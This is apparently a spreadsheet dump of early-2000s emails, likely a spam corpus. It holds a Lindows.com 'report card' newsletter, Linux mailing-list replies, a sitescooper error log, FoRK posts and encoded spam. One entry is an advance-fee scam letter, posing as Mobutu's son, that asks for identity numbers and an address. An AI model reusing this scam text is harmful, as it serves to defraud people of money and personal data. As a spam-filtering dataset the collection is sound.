 see  &lt;http://www.lindows.com/products&gt; www.lindows.com/products 
 LindowsOS and Lindows.com are trademarks of Lindows.com, Inc. LinuxR is
 a registered trademark of Linus Torvalds. MicrosoftR WindowsR operating
 system is a registered trademark or service mark of the Microsoft
 Corporation.
 mm18
 ___________________________________________________________
 To change your mailing list options please go to www.lindows.com/update
 ------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84
 Content-Type: text/html;
 	charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
 charset=3Dus-ascii"&gt;
 &lt;TITLE&gt;Message&lt;/TITLE&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=3Dleft&gt;
 &lt;P class=3DMsoPlainText style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;FONT =
 face=3DArial&gt;&lt;SPAN=20
 style=3D"mso-spacerun: yes"&gt;&lt;/SPAN&gt;&lt;?xml:namespace prefix =3D o ns =3D=20
 "urn:schemas-microsoft-com:office:office" /&gt;&lt;o:p&gt;&lt;FONT=20
 face=3D"Times New Roman"&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial, Helv" =
 size=3D1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;If this=20
 message is not displaying properly, &lt;A =
 href=3D"http://lindows.com/mm"&gt;click=20
 here&lt;/A&gt; to launch it in your browser.&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#0577ba cellPadding=3D0 =
 width=3D600=20
 bgColor=3D#dfeedc border=3D1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;
       &lt;P align=3Dcenter&gt;&lt;A href=3D"http://lindows.com/"&gt;&lt;IMG =
 height=3D160=20
       src=3D"http://net2.com/mailers/header.jpg" width=3D600 =
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D561 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D561&gt;
             &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;&lt;FONT size=3D5&gt;Michael&amp;#8217;s =
 Minute:=20
             &lt;BR&gt;Lindows.com Report Card &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
         &lt;TR&gt;
           &lt;TD class=3Dtableborders vAlign=3Dtop width=3D561&gt;
             &lt;P align=3Dleft&gt;&lt;FONT face=3DArial,Helv&gt;As summer arrives, =
 many school=20
             children are coming home with their report cards.&amp;nbsp; I =
 thought=20
             this would be a good time to see what kind of grades =
 Lindows.com=20
             received for their first 9 months in =
 operation.&lt;/FONT&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;&lt;FONT=20
             color=3D#dfeedc&gt;.&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&amp;nbsp;&lt;A=20
             href=3D"http://lindows.com/timeline"&gt;&lt;IMG height=3D329=20
             src=3D"http://www.net2.com/mailers/images/timeline.jpg" =
 width=3D218=20
             border=3D0&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT face=3D"Arial, Helv" =
 size=3D1&gt;To view=20
             the Timeline of Lindows.com's first 9 months in business, &lt;A =
             href=3D"http://lindows.com/timeline"&gt;click here&lt;/A&gt;.&lt;/FONT&gt; =
 &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD class=3Dtableborders vAlign=3Dtop width=3D561&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&lt;B&gt;&lt;BR&gt;&lt;FONT=20
             size=3D4&gt;Operating System: &lt;/FONT&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-SIZE: 10pt; FONT-FAMILY: 'Courier =
 New'"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;As =
 of last week,=20
             consumers can experience LindowsOS in one of two ways. One =
 way is to=20
             buy a computer running LindowsOS from &lt;A=20
             href=3D"http://www.lindows.com/walmart"&gt;Walmart.com&lt;/A&gt;, for =
 as little=20
             as $299. This is a significant milestone for us, as we've =
 partnered=20
             with our first builder (Microtel) and retailer (Walmart). =
 These=20
             computers work great out of the box and are ideal for =
 general=20
             purpose computing tasks. &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;For =
 those who=20
             already have a computer and also wish to try LindowsOS, we =
 offer the=20
             &lt;A href=3D"http://www.lindows.com/signup"&gt;Insider =
 program&lt;/A&gt;. This=20
             gives people wanting early access to LindowsOS a chance to =
 try out=20
             LindowsOS as it develops. Currently, Insiders report =
 installation=20
             success about 80%&amp;nbsp; of the time on their PCs. Therefore =
 we have=20
             some room to grow, consequently, this product is not yet for =
             everyone. &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;Some =
 may wonder=20
             how we can sell a computer at &lt;A=20
             href=3D"http://www.lindows.com/walmart"&gt;Walmart &lt;/A&gt;when the =
 program=20
             available directly from Lindows.com is billed as not =
 completely=20
             ready. The difference is the &lt;A=20
             href=3D"http://www.lindows.com/walmart"&gt;Walmart&lt;/A&gt; =
 computers are=20
             certified, ensuring that all components&amp;nbsp; work elegantly =
 with=20
             LindowsOS. That's much different than offering a software =
 program=20
             that will work on &lt;I&gt;any&lt;/I&gt; computer in the world - =
 &lt;I&gt;that's very=20
             difficult&lt;/I&gt;. It's the difference between making a single =
 pair of=20
             shoes for a known foot size versus opening a shoe store with =
 every=20
             style of shoe for every size foot. The first one is easy, =
 the second=20
             one is a much bigger job.&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;While the=20
             installer is fantastically easy and fast (the entire OS =
 installs in=20
             under 5 minutes), we've got a lot more work to do to support =
 a wider=20
             range of hardware, printers and other devices. &lt;/SPAN&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;Grade:&amp;nbsp;=20
             B&lt;/SPAN&gt;&lt;/P&gt;
             &lt;HR&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;&lt;FONT =
 size=3D4&gt;Software:=20
             &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;Our =
 goal to give=20
             people choice means giving them choice not just on their =
 operating=20
             system, but access to all the programs they'll want to add =
 to their=20
             computer to really make it work for them in their school, =
 home or=20
             business.&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;&lt;A=20
             href=3D"http://www.lindows.com/clicknrun"&gt;Click-N-Run&lt;/A&gt; is =
 the=20
             easiest way to load software onto a computer. For the first =
 time a=20
             Linux based system has leapt ahead of Microsoft's operating =
 systems=20
             in ease of use. With 1,000 plus programs already in the &lt;A=20
             href=3D"http://www.lindows.com/warehouse"&gt;Click-N-Run =
 Warehouse&lt;/A&gt;,=20
             users can find quality software titles for just about any =
 computing=20
             task and, with a single mouse-click download, install and =
 run these=20
             programs. All these titles are included in the $99. This is =
 a=20
             fantastic consumer experience and price point. Look for a=20
             lot&amp;nbsp;more great software in the Warehouse in the =
 future.&amp;nbsp;=20
             &lt;/SPAN&gt;&lt;SPAN style=3D"FONT-WEIGHT: 700; FONT-FAMILY: =
 Arial"&gt;Grade:=20
             A-&lt;/SPAN&gt;&lt;/P&gt;
             &lt;HR&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;&lt;FONT =
 size=3D4&gt;Microsoft=20
             Windows Compatibility:&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;We =
 live in a=20
             Microsoft world, so there needs to be a bridge from the =
 legacy world=20
             to the broadband LindowsOS world. This means we need to =
 support some=20
             bridge programs, file types and network devices to help =
 people=20
             interact with the legacy Microsoft world. LindowsOS =
 computers come=20
             with software to view, print and copy popular Microsoft =
 applications=20
             like: MS Word files, MS PowerPoint files and MS Excel =
 documents.=20
             There's great Linux based alternatives and we'll guide =
 people to=20
             those alternatives (they're better than most people =
 realize). To=20
             edit Microsoft files, we'd highly recommend one of the =
 office suites=20
             in our Warehouse such as &lt;A=20
             =
 href=3D"http://www.lindows.com/lindows_products_details.php?id=3D8966"&gt;Op=
 enOffice&lt;/A&gt;.=20
             &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;Many =
 of these=20
             programs are of very high-quality and a great value since =
 they're=20
             included in the &lt;A=20
             href=3D"http://www.lindows.com/warehouse"&gt;Warehouse&lt;/A&gt;. =
 Sometimes=20
             there are no viable alternatives for those programs, so =
 we're=20
             investing necessary resources to support some Microsoft =
 Windows=20
             based programs. Stay tuned for more developments in this =
 area. Our=20
             printer support is ok, but there's lots of room for more =
 drivers.=20
             Connecting to MS Windows based file servers is still a =
 challenge. We=20
             need to get better in the above areas. &lt;/SPAN&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;&amp;nbsp;Grade: =
 B=20
             &lt;/SPAN&gt;&lt;/P&gt;
             &lt;HR&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;&lt;FONT=20
             size=3D4&gt;Communication:&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;We've tried to=20
             be diligent in communicating where our company is going =
 which is why=20
             there's typically a weekly &lt;A=20
             href=3D"http://www.lindows.com/mm"&gt;Michael's Minute&lt;/A&gt;. =
 While our=20
             overall goal has not deviated - Bringing Choice To Your =
 Computer -=20
             our implementation has become more focused as we listened to =
 what=20
             our Insiders and potential customers have told us. (Keep =
 sending me=20
             your comments.) We have been de-emphasizing running =
 Microsoft=20
             Windows programs because many of you told us you detest =
 spending=20
             hundreds of dollars on individual software programs, forced =
 upgrades=20
             and activation codes. It's not just the operating system, =
 but costly=20
             Microsoft programs you're wanting to avoid. &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;Consequently,=20
             we've been emphasizing Click-N-Run because it will change =
 the way=20
             you think about software. Having a neatly &lt;A=20
             href=3D"http://www.lindows.com/warehouse"&gt;categorized =
 library&lt;/A&gt; of=20
             1&lt;SPAN class=3D176495422-26062002&gt;,&lt;/SPAN&gt;000+ software =
 titles all for=20
             a flat annual fee at your digital fingertips is an entirely =
 new way=20
             to think about paying for software. It's immediate, elegant =
 and=20
             affordable. &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;There are lots=20
             of mischaracterizations about Lindows.com swirling around - =
 which=20
             happens when you have a small organization which can't =
 address every=20
             question or publication. We'll do a better job of addressing =
 these=20
             in the future. For now, I wrote up answers to the Top Myths =
 about=20
             Lindows.com. Check them out by visiting: &lt;A=20
             style=3D"FONT-FAMILY: Arial"=20
             =
 href=3D"http://www.lindows.com/myths"&gt;www.lindows.com/myths&lt;/A&gt;&amp;nbsp;=20
             &lt;/SPAN&gt;&lt;SPAN style=3D"FONT-WEIGHT: 700; FONT-FAMILY: =
 Arial"&gt;Grade:=20
             B+&lt;/SPAN&gt;&lt;/P&gt;
             &lt;HR&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN=20
             style=3D"FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;&lt;FONT =
 size=3D4&gt;Overall:=20
             B+&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT size=3D3&gt;Michael Robertson&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT size=3D2&gt;Please visit &lt;A=20
             href=3D"http://support.lindows.com/"&gt;support.lindows.com&lt;/A&gt; =
 to answer=20
             questions you may have about LindowsOS or =
 Lindows.com.&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT size=3D2&gt;Bringing Choice to Your Computer! =
 &lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
             &lt;DIV&gt;&lt;SPAN class=3D154440621-26062002&gt;&lt;FONT =
 size=3D1&gt;LindowsOS is=20
             presently available on LindowsOS Certified Computers being =
 offered=20
             from Lindows.com &lt;/FONT&gt;&lt;A=20
             href=3D"http://www.lindows.com/builder"&gt;&lt;FONT=20
             size=3D1&gt;Builder&lt;/FONT&gt;&lt;/A&gt;&lt;FONT size=3D1&gt; partners.&amp;nbsp; =
 The General=20
             Release of LindowsOS (available now for download and preview =
 to=20
             Lindows.com &lt;/FONT&gt;&lt;A =
 href=3D"http://lindows.com/signup"&gt;&lt;FONT=20
             size=3D1&gt;Insider&lt;/FONT&gt;&lt;/A&gt;&lt;FONT size=3D1&gt; partners) will be =
 made=20
             available later this year for those wishing to install and =
 run=20
             LindowsOS on their existing computer hardware.&amp;nbsp; The =
 General=20
             Release version will support a wider range of computer =
 hardware and=20
             includes unique features such as a =
 &amp;#8220;Friendly-Install&amp;#8221; alongside an=20
             existing Microsoft&amp;reg; Windows operating system, a =
 streamlined=20
             installation process which requires no computer knowledge, =
 and the=20
             ability to run a select set of "bridge" Windows-compatible =
 programs.=20
             For more information see &lt;/FONT&gt;&lt;A=20
             href=3D"http://www.lindows.com/products"&gt;&lt;FONT=20
             size=3D1&gt;www.lindows.com/products&lt;/FONT&gt;&lt;/A&gt;&lt;FONT=20
             size=3D1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/DIV&gt;
             &lt;DIV style=3D"WIDTH: 132px; HEIGHT: 19px"&gt;&lt;/DIV&gt;
             &lt;P&gt;&lt;FONT size=3D1&gt;LindowsOS and Lindows.com are trademarks =
 of=20
             Lindows.com, Inc. Linux&amp;reg; is a registered trademark of =
 Linus=20
             Torvalds. Microsoft&amp;reg; Windows&amp;reg; operating system is a =
 registered=20
             trademark or service mark of the Microsoft =
 Corporation.&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT size=3D1&gt;mm18&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;BR&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;P=20
 align=3Dcenter&gt;__________________________________________________________=
 _&lt;BR&gt;&lt;FONT=20
 size=3D2&gt;To change your mailing list options please go to &lt;A=20
 href=3D"http://www.lindows.com/update"&gt;www.lindows.com/update&lt;/A&gt;&lt;/FONT&gt;&lt;=
 /P&gt;
 &lt;P class=3DMsoPlainText style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;FONT=20
 size=3D2&gt;&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: hello
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM=SEKO MOSHOOD MOBUTU
 Tel=234-1-776-2397
 Dear Friend
  I am the first son of the late Mobutu Sese Seko, the
 former
  President 
  of the Congo Republic. I am presently under
 protective custody
  in Nigeria
  as
 a political refugee. I got your contact over the internet during my
 search for a
  stranger
  that
 can cooperate with me in this mutual transaction.i took this option because my family friends and associates cpuld not be trusted any more since they contributed to my present predicament.
 I want you to note that this business will benefit
 both of us.
  However, 
 you must confirm your ability to handle this because
 it involves
  a large
 amount of money. The money (50 million US DOLLARS is
 my share of
  my
  father's
 estate. I boxed and shipped the money to a security
 company
  abroad at the
 peak of the war/political crisis that rocked my
 country few
  years ago. Now
 the crisis has ended and I need a trustworthy person
 like you to
  proceed to
 the place of the security company in order to clear
 the fund and
  invest on
 my behalf as I dont want my name to be used for now.
 Note that I will send to you the relevant documents
 that will
  enable 
 you take possesion of the the fund for onward
 investment for our
  mutual 
 benefit. All I need from you is as follows:
 1. A letter of committment (duely signed) that you
 will keep the
 transaction strictly confidential.
 2. Your confirmation of your ability to handle this.
 3. Your international identity or driving licence
 number for
  identification
 to the security company.
 4. Your telephone and fax numbers for communication.
 5. Your full permanent address.
 As soon as I get the above information from you, I
 will disclose
  to 
 you the name and the country of the security company.
 I will
  forward your
 name and particulars to the security company to enable
  them contact you
 accordingly. I will also send to you a LETTER OF
 AUTHORITY to
  enable you
 clear the fund on my behalf. Note that this is a very
 safe
  transaction as
 this money is my share of my father'sestate.
  I am waiting for your response to enable us proceed.
  Regards,
 Moshood Seko Mobutu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Imap servers that support the MH folder/file standards
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Thu, 25 Jul 2002, "Stephen" == Stephen Hocking wrote:
   Stephen&gt; What I'd like to do is use an imap capable mailer to
   Stephen&gt; communicate with an imap server that is serving up my MH
   Stephen&gt; folders. Does anyone know of any Imap servers that can do
   Stephen&gt; this?
 This topic comes up every so often on this list.  The short answer is 
 no, there really isn't an IMAP server which knows how to do this.
 The longer answer is, UW-IMAP claims it does, but doesn't do a good 
 job, and doesn't update scan caches, unseen, etc.
 You may have better luck while on the road using raw mh commands to 
 read you e-mail if you have ssh access to your internal environment.
 I've been doing this for quite a long time, and, after the learning 
 curve of the mh command set (which I still don't know completely),
 I'm quite able to access my e-mail and respond to those e-mails which 
 require a response.
 Another option is using mutt as your mail client when you're remotely 
 accessing e-mail.  Mutt does a decent job of dealing with mh folders, 
 though it doesn't update scan caches or unseen files either.  But it 
 is a decent interface alternative to raw mh, and it's quite 
 customizable.
 The real answer to your question is that we need not an IMAP server 
 that understands mh folders, but an mh server to which a local client 
 could connect to.  In theory, it shouldn't be too hard (technically) 
 to cobble this together with ssh.  Replace all of exmh's calls to mh 
 commands with a wrapper which uses ssh to lob these commands over to 
 a remote system, and dump the output back into the local exmh client.
 -- 
 Seeya,
 Paul
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you, that was exactly what I needed.
 DVD works great now.
 1 more problem?
 Video-DVDRip worked on RH 7.3 but can't get contents of DVD, last
 message is 'libdvdread: using libdvdcss 1.2.2 for DVD access'.
 but it fails.
 On Sun, 2002-10-06 at 20:32, Chris Kloiber wrote:
 &gt; On Sun, 2002-10-06 at 21:17, Alvie wrote:
 &gt; &gt; hdparm -d1 /dev/hdc says Operation not Permitted.
 &gt; &gt; DVD playback is very jumpy.
 &gt; &gt; Does someone have any ideas on what I can do yo get DMA transfers?
 &gt; &gt; Thanks Alvie
 &gt; 
 &gt; Add to /etc/modules.conf:
 &gt; 
 &gt; options ide-cd dma=1
 &gt; 
 &gt; -- 
 &gt; Chris Kloiber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</si>
  <si>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Subject: Cron &lt;yyyy@dogma&gt; /home/yyyy/lib/sitescooper/automatic/runme
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Some errors were encountered during tonight's sitescooper run:
 SERIOUS WARNINGS:
 -------------------------------------------------------------------------
 SITE WARNING: "advogato_diaries.site" line 1: HTTP GET failed: 500 Can't connect to www.advogato.org:80 (Timeout) (http://www.advogato.org/recentlog.html)
 SITE WARNING: "advogato.site" line 1: HTTP GET failed: 500 Can't connect to www.advogato.org:80 (Timeout) (http://www.advogato.org/article/)
 SITE WARNING: "DOC.cf" line 6: Configuration line invalid (needs URL line first?):
 SITE WARNING: "DOC.cf" line 7: Configuration line invalid (needs URL line first?):
 SITE WARNING: "ISILO.cf" line 6: Configuration line invalid (needs URL line first?):
 SITE WARNING: "ISILO.cf" line 7: Configuration line invalid (needs URL line first?):
 SITE WARNING: "linux_gazette.site" line 3: Redirected to http://www.linuxgazette.com/ from http://www.linuxgazette.com/lg_frontpage.html
 SITE WARNING: "PLUCKER.cf" line 6: Configuration line invalid (needs URL line first?):
 SITE WARNING: "PLUCKER.cf" line 7: Configuration line invalid (needs URL line first?):
 SITE WARNING: "unblinking.site" line 11: Unrecognised:
 SITE WARNING: "world_new_york.site" line 1: HTTP GET failed: 404 Not Found (http://www.worldnewyork.org/avantgo.php)
 SITE PATTERN CHANGED WARNINGS:
 -------------------------------------------------------------------------
 SITE WARNING: "crypto_gram.site" line 1: LinksStart pattern "&lt;TABLE BORDER=0 CELLPADDING=5 CELLSPACING=5&gt;" not found in page http://www.counterpane.com/crypto-gram.html
 SITE WARNING: "freshmeat_articles.site" line 1: LinksStart pattern "-- Content --" not found in page http://freshmeat.net/articles/
 SITE WARNING: "freshmeat.site" line 6: StoryStart pattern "&lt;TABLE CELLSPACING="0" CELLPADDING="3"" not found in page http://freshmeat.net/
 SITE WARNING: "genehack.site" line 1: StoryStart pattern "/universal header" not found in page http://www.genehack.org/
 SITE WARNING: "linux_hu.site" line 1: StoryStart pattern "-- Hirek -----------" not found in page http://www.linux.hu/
 SITE WARNING: "linux_magazine.site" line 1: LinksStart pattern "&lt;TD CLASS="FEATURES" BGCOLOR="CCFFCC" ALIGN="CENTER"&gt;" not found in page http://www.linux-mag.com/
 SITE WARNING: "linuxworld.site" line 3: LinksStart pattern "(?i)start features" not found in page http://www.linuxworld.com/linuxworld/home.html
 SITE WARNING: "mandrakeforum.site" line 1: LinksStart pattern "START: Body" not found in page http://www.mandrakeforum.com/
 SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "&lt;h2&gt;Columns&lt;/h2&gt;" not found in page http://www.stonehenge.com/merlyn/LinuxMag/
 SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "&lt;h2&gt;Columns&lt;/h2&gt;" not found in page http://www.stonehenge.com/merlyn/WebTechniques/
 SITE WARNING: "plastic.site" line 1: LinksStart pattern "begin index block" not found in page http://www.plastic.com/
 SITE WARNING: "sitescooper_archive.site" line 5: LinksStart pattern "&lt;font.*&gt;date&lt;/font&gt;" not found in page http://groups.yahoo.com/group/sitescooper-archive/
 SITE WARNING: "slashdot.site" line 7: LinksStart pattern "&amp;nbsp;&lt;A href=/hof.shtml&gt;hof&lt;/A&gt;" not found in page http://slashdot.org/index.pl?light=1&amp;noboxes=1&amp;noicons=1
 SITE WARNING: "tbtf_log.site" line 3: StoryStart pattern "-- created by Blogger! --" not found in page http://tbtf.com/blog/
 SITE WARNING: "the_onion.site" line 5: LinksStart pattern "&lt;FRAMESET" not found in page http://www.theonion.com/
 SITE WARNING: "the_register.site" line 3: LinksStart pattern "&lt;ILAYER id=ad1 visibility=hide(?s:.*?)&lt;/ILAYER&gt;" not found in page http://www.theregister.co.uk/content/29/index.html
 SITE WARNING: "user_friendly.site" line 2: StoryStart pattern "&lt;!--Start Current Strip--&gt;" not found in page http://www.userfriendly.org/static/
 SITE WARNING: "weekly_news.site" line 1: LinksStart pattern "-- Leading stuff goes here --" not found in page http://www.lwn.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gordon Mohr &lt;gojomo@usa.net&gt; writes:
     G&gt; Gary Lawrence Murphy writes:
     &gt;&gt; 20,000 years ago, one of them the size of Mt Everest just ever
     &gt;&gt; so slightly grazed us and left a scar 400km long in the side of
     &gt;&gt; South America
     G&gt; Do you have any further information about this incident that
     G&gt; would me find more details on the web?
 Good question.  This was covered in one of the amateur rags, maybe Sky
 and Telescope or even Scienterrific American, long before there was any
 web to speak of, but you'd think a 400km gash in the Earth would be
 pretty easy to find ;) I remember it from an issue perhaps in the very
 late 80's or early 90's.
 It's interesting to note that NT7 and many other NEO bodies are all on
 trajectories that approach the Earth from under the ecliptic, so with
 the Earth tilt, South America becomes a pretty good target.  In trying
 to find you a site through Google, I turned up several different
 impact sites in Venezuela and Brazil, with ages ranging from 251M to
 70 years, but not the 400km gash from the above story.  
 The only google refs I found from that period is one in Arizona
 (famous impact crater) and another in NM; do wish I had noted the
 actual South American /country/ that contains the scar; Venezuela
 sticks in my mind but I can't be certain.  
 http://neo.jpl.nasa.gov/images/meteorcrater.html
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: MIT OpenCourseWare
</t>
  </si>
  <si>
    <t xml:space="preserve">Better late than never -- I received a grant from Project Athena, MIT's original courseware effort, and found at the end that they hadn't thought much about distribution of the courseware.  Instead, they had gotten wrapped up with X and various Unix tools, and other useful, but not strictly educational efforts.
 Ken
 &gt; -----Original Message-----
 &gt; From: B.K. DeLong [mailto:bkdelong@pobox.com]
 &gt; Sent: Tuesday, October 01, 2002 9:06 AM
 &gt; To: Eugen Leitl; forkit!
 &gt; Subject: Re: MIT OpenCourseWare
 &gt; 
 &gt; 
 &gt; At 05:38 PM 9/30/2002 +0200, Eugen Leitl wrote:
 &gt; 
 &gt; 
 &gt; &gt;Looks useful. Hopefully, they'll put up some more material soon.
 &gt; &gt;
 &gt; &gt;         http://ocw.mit.edu/global/all-courses.html
 &gt; 
 &gt; I'll be sure to keep everyone posted on the next update. :)
 &gt; 
 &gt; 
 &gt; --
 &gt; B.K. DeLong
 &gt; bkdelong@ceci.mit.edu
 &gt; OpenCourseWare
 &gt; 
 &gt; +1.617.258.0360
 &gt; +1.617.877.3271 (cell)
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cheap FLAT RATE InState, USA, Worldwide Calling
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C5_81A02D8D.A0703A60
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PEhUTUw+DQo8VFI+PFREPjxGT05UIGZhY2U9IkFyaWFsLCBWZXJkYW5hLCBI
 ZWx2ZXRpY2EiIHNpemU9LTE+DQo8Rk9OVCBTSVpFPTIuNSBDT0xPUj0jMDAw
 MDAwPjxmb250IGZhY2U9VGFob21hPg0KSGksIGptIC0gPGJyPjxicj4NClF1
 ZXN0aW9uIC0gPGI+Q2FuIHlvdSBiZWF0IExvbmcgRGlzdGFuY2UgZm9yIDxG
 T05UIGNvbG9yPSNmZjAwMDA+VW5kZXIgNCBDZW50cy9NaW48L0ZPTlQ+Pzwv
 Yj48QlI+PEJSPg0KSGVyZSBpcyBhIHN1bW1hcnkgb2YgdGhpcyBzZXJ2aWNl
 Ojxicj48YnI+DQombmJzcDsmbmJzcDsmbmJzcDs8Rk9OVCBjb2xvcj0jMDAw
 MGZmIGZhY2U9V2luZ2RpbmdzIHNpemU9Mz4oPC9GT05UPiZuYnNwOyZuYnNw
 Ow0KQ292ZXJzIDx1PkFMTDwvdT4gPGI+SW4tU3RhdGU8L2I+IFRvbGwgY2Fs
 bHMgYW5kIHRvIDx1PkFMTDwvdT4gPGI+NTAgU3RhdGVzPC9iPjxicj48YnI+
 DQombmJzcDsmbmJzcDsmbmJzcDs8Rk9OVCBjb2xvcj0jMDAwMGZmIGZhY2U9
 V2luZ2RpbmdzIHNpemU9Mz4oPC9GT05UPiZuYnNwOyZuYnNwOw0KPGI+SU5U
 RVJOQVRJT05BTDwvYj4gQ2FsbGluZyBvcHRpb25zPGJyPjxicj4NCiZuYnNw
 OyZuYnNwOyZuYnNwOzxGT05UIGNvbG9yPSMwMDAwZmYgZmFjZT1XaW5nZGlu
 Z3Mgc2l6ZT0zPig8L0ZPTlQ+Jm5ic3A7Jm5ic3A7DQo8Yj4yNC83IEFueXRp
